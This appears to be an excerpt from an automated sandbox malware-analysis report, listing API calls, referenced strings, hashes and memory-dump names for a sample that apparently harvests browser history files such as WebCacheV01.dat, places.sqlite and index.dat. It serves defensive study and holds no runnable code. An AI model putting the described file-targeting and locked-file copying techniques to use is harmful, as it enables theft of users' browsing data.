• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 71295984-2036018995
• Opcode ID: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
• Instruction ID: cef4cdc2aa1c6a3535febfa580eefb1bb336ec347ee4d762a3996ce24f9a1629
• Opcode Fuzzy Hash: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
• Instruction Fuzzy Hash: 16110B31901224AADB24B35D9C4D9EF736CDB01308F6204ABE805A2152E628EEC586DE
APIs
• wcschr.MSVCRT ref: 0041632C
• _snwprintf.MSVCRT ref: 00416351
• WritePrivateProfileStringW.KERNEL32(?,?,?,004552B8), ref: 0041636F
• GetPrivateProfileStringW.KERNEL32(?,?,004136D7,?,00000000,004552B8), ref: 00416387
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                        • String ID: "%s"
                                                                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                                                                        • Opcode ID: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
                                                                                                                                                        • Instruction ID: 6e1343c4dc7dbf7023b058b03300c33d8cf364170467c751c5f20a7e8d9ce334
                                                                                                                                                        • Opcode Fuzzy Hash: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
                                                                                                                                                        • Instruction Fuzzy Hash: 3A018B3240421EBBEF219F40DC05FEA3B6AFF05304F048065BD24901A1D33AC565DB99
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 00415702
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041571C
• GetProcessTimes.KERNELBASE(00000000,?,00000000,?,?,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 0041573F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
• Opcode ID: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
• Instruction ID: a8c3bf7ddc1ca0b25540cafbdac30c397c85bf92067745488bba3609cc165c05
• Opcode Fuzzy Hash: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
• Instruction Fuzzy Hash: 4DF01C75140708EFDB019FA4FD06BA63BA4EB48342F044075B91CD2562D776C9A8DF5A
APIs
• memcpy.MSVCRT(00000048,00452BA0,0000002C,000003FF,?,?,00000000,?,00401230), ref: 00445EC0
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$no such vfs: %s
• API String ID: 3510742995-3177411277
• Opcode ID: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
• Instruction ID: 74b0bd9825c19e6685264d1484a235018c45777622f8ba0ce628bc876c866ef4
• Opcode Fuzzy Hash: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
• Instruction Fuzzy Hash: 03710A71604701BFE710AF16CCC1EA6B7A8BB05318F15452FF41897383DB79E8958BAA
APIs
• memset.MSVCRT ref: 00409A2F
  • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
  • Part of subcall function 00404F45: memset.MSVCRT ref: 00404F65
• memset.MSVCRT ref: 00409A82
• memset.MSVCRT ref: 00409A9A
• memset.MSVCRT ref: 00409AB2
• memset.MSVCRT ref: 00409ACA
• memset.MSVCRT ref: 00409AE2
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
  • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
  • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
  • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
• Instruction ID: 17c299170da2f5c18cd71e263501a174130e3f539370559341ef3f42c2fa300c
• Opcode Fuzzy Hash: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
• Instruction Fuzzy Hash: 725189B290121CBEEB50FB51DC42EDF776CEF04314F0100BAB908B6182EA759F949BA5
APIs
• memcmp.MSVCRT(?,?,00000004,00000007,?), ref: 0042115A
• memcmp.MSVCRT(?,SQLite format 3,00000010,00000007,?), ref: 00421185
• memcmp.MSVCRT(?,@ ,00000003,?,00000007,?), ref: 004211F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
• Instruction ID: 8a8e30af19285e6602da34aa628d26869ae88a683b6dca71fc9513d498463ada
• Opcode Fuzzy Hash: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
• Instruction Fuzzy Hash: A451F271A00225DBDB10DFA9D8817AAB7F4EF64314F55019BE804EB256D778EE01CBA8
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
• Opcode ID: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
• Instruction ID: 144d33eed54290a6f9744a9a5dbcb7717411fe56fc34cf4e9986f4238599fcc7
• Opcode Fuzzy Hash: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
• Instruction Fuzzy Hash: F221F8707006019FE318AB36C981E96B3A9FF95314B11026FE4259B291DBB5BCD18BDD
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040C36D
• memset.MSVCRT ref: 0040C387
  • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
  • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
  • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
  • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040C3A5
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040C3CD
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
• Opcode ID: 394c4c75fa7beffb2d5a2aa385abc5dc66d0e768d5be117711317e139cb40491
• Instruction ID: 3131e6838cf381c5c62b3ff9a3a8967ade7f88a79be8704d85ddc64b4c2fe5ff
• Instruction Fuzzy Hash: A51137B2D8021CA6EB10E761DC86FDB77ACAB14308F1105B7BD04F51C3E6B89ED84699
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043C86A
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
• Opcode ID: b3be54a25f95d4426186d96762bdc05463f7e7b5d4954b2f9a60bb8f93d58d58
• Instruction ID: d119b0dec74e9b19e5a25435855cd8d11ca1b6cc1a1ec524576f73f373bec87f
• Instruction Fuzzy Hash: 05827A71A00218AFDF25DF69C881AAE7BB1FF08318F14511AFD15A7292D77AEC41CB94
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D57A
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D598
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5B6
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5D4
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 9e807e9980987f70bb2a73660c85433d145fa0dd07df9d2969b3cf11719032c3
• Instruction ID: 0e0a047154a33720e6f2f45df11e84489cdf12d838f6504bc1093cfb551ce4d4
• Instruction Fuzzy Hash: F70171B26023005EFB5EDB3AED07B2D66A0EB48311F04453EE602CD1F6EEB5D6408B08
APIs
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
  • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865
• memcmp.MSVCRT(?,00452BCC,00000010,?,00000000,?), ref: 004169BD
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
• Opcode ID: c8c4ce928d5e3aac457400f17cb603f47478cc1e293077f961af05addd09d54a
• Instruction ID: d6b0cb39fe6b11ebd3f8115ad541cfda54a2ea99a1e62a8371d336f42745e82c
• Instruction Fuzzy Hash: CB3183B1A00219AFCF10DF95CD80AEEB7B8BF48354F11455AE811B3241D778ED848F65
APIs
  • Part of subcall function 0040BD7C: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
  • Part of subcall function 0040BD7C: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
  • Part of subcall function 0040BD7C: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
  • Part of subcall function 0040BD7C: GetFileSize.KERNEL32(?,00000000), ref: 0040BE32
  • Part of subcall function 0040BD7C: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
  • Part of subcall function 0040BD7C: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
  • Part of subcall function 0040BD7C: WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
  • Part of subcall function 0040BD7C: UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
  • Part of subcall function 0040BD7C: CloseHandle.KERNELBASE(?), ref: 0040BE9C
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C2E0
  • Part of subcall function 0040C009: memset.MSVCRT ref: 0040C0DE
  • Part of subcall function 0040C009: wcschr.MSVCRT ref: 0040C116
  • Part of subcall function 0040C009: memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C14A
• DeleteFileW.KERNELBASE(?,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C301
• CloseHandle.KERNEL32(000000FF,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C328
  • Part of subcall function 0040BED3: memset.MSVCRT ref: 0040BF1B
  • Part of subcall function 0040BED3: _snwprintf.MSVCRT ref: 0040BFB5
  • Part of subcall function 0040BED3: free.MSVCRT ref: 0040BFE9
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
• Opcode ID: b5aaa30312d5fcc67f85845942f74e89b96bccb2180b41cf2d59821ccef51685
• Instruction ID: 93ccc22cef0f4177ecd56315f2e6d26b449d926f0b5ad61dc23816b56d629bd5
• Instruction Fuzzy Hash: D13106B1C00628DBCF60DBA5CC856CEF7B8EF54314F2042ABA518B31A1DB756E958F58
APIs
  • Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FAA
  • Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FBF
  • Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00412FE8
  • Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00413011
• memset.MSVCRT ref: 00412DF6
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
  • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
  • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
  • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
  • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
  • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
  • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
  • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                                                                        • API String ID: 2641622041-467022611
                                                                                                                                                        • Opcode ID: 08c1b444eb520b35a7a7d5c0fb7f8aeaa4787e0a4d64b0aa0e69da993d74c1dc
                                                                                                                                                        • Instruction ID: 0913544ad1c32b840834749151f10e29a01f1c6a2781536613fb288058adf295
                                                                                                                                                        • Opcode Fuzzy Hash: 08c1b444eb520b35a7a7d5c0fb7f8aeaa4787e0a4d64b0aa0e69da993d74c1dc
                                                                                                                                                        • Instruction Fuzzy Hash: BE115E72940219A6CB10FA66CD46ACE77BC9F40354F1101B6A914F61C2EB3CAF95CAA9
APIs
  • Part of subcall function 004194C7: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
  • Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194F9
  • Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194FF
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00419574
• GetLastError.KERNEL32 ref: 0041957E
Yara matches
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
• Instruction ID: 11002ccd72b8a74f474208f9e9940f6dfa3330b5e17921820ced85d813cc92d2
• Opcode Fuzzy Hash: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
• Instruction Fuzzy Hash: E401AD33208208BFEB119FA5DC41BEA3B6DEB45360F100432F908E6240D325ED9487ED
Strings
Yara matches
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
• Instruction ID: b35fd175f81657b3a82865a2fc917a928efaf22c6e287d3be843c0a7ee8e476f
• Opcode Fuzzy Hash: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
• Instruction Fuzzy Hash: 41015671801568D5DB20E761DC426DE73BC9F04314F5056B7A819F21D2E7389F858F9D
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
• GetLastError.KERNEL32 ref: 004194F9
• GetLastError.KERNEL32 ref: 004194FF
Yara matches
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
• Instruction ID: 1998d2df4d7dc22cf6efa6b8a4ec31ccf4d22c2bb1f0502cb4b25adc0a96311e
• Opcode Fuzzy Hash: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
• Instruction Fuzzy Hash: 63F03072514115FBCB019F74DC109AA7AE9EB05360B144736F822E6294E730ED419A94
APIs
• GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
• GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
Yara matches
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
• Instruction ID: fdba6f523a0edeb98830ec5a6e2b40949d18461f6cb5c57ccf156b0356e15e7f
• Opcode Fuzzy Hash: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
• Instruction Fuzzy Hash: 68E0927A500319E7DB605B50EC4CFC737BCEF45304F000070B945E2150E634AA888BA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414002), ref: 0040A620
Yara matches
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 59ad0a99eb535f7e7912cc29790ae94c4f7a44c8f5267afefbc4dab143821918
• Instruction ID: 54e7b0a2fac03467780574bc71659ffc5b237acda61c65fae5605327c05023f7
• Opcode Fuzzy Hash: 59ad0a99eb535f7e7912cc29790ae94c4f7a44c8f5267afefbc4dab143821918
• Instruction Fuzzy Hash: ADE04F3A200290BBE2311B26EC0CF4B2E79DBCBB21F150539B955E21E086204919C768
APIs
• malloc.MSVCRT ref: 00409FCF
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
• free.MSVCRT ref: 00409FF0
Yara matches
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
• Instruction ID: 3fa6d8dc34f6a2d7cc02f22bfce68f49e3ca57b08464e0138f2fbe8277461859
• Opcode Fuzzy Hash: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
• Instruction Fuzzy Hash: B3F082B26052269FD708AF75A98185BB39DEF55364B12483FF404E7282DB389C50C7A9
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC
                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,lXA,00000104,0041586C,00000000,?), ref: 00415993
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$FileModuleName
                                                                                                                                                        • String ID: lXA
                                                                                                                                                        • API String ID: 3859505661-3442822412
                                                                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                        • Instruction ID: fee6c053b5955f725308cf381fe1744ee842b03cbd95df917c5b16bd142f82aa
                                                                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                        • Instruction Fuzzy Hash: B4D0C9B2225711EBE621EA748C01BDBA7D46B84720F009C1AB191D6190D764D854565A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
                                                                                                                                                        • Instruction ID: 8f6596d4f93993bca5fedc02ea909bb24cc5f22f60e220bd561afb4714264618
                                                                                                                                                        • Opcode Fuzzy Hash: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
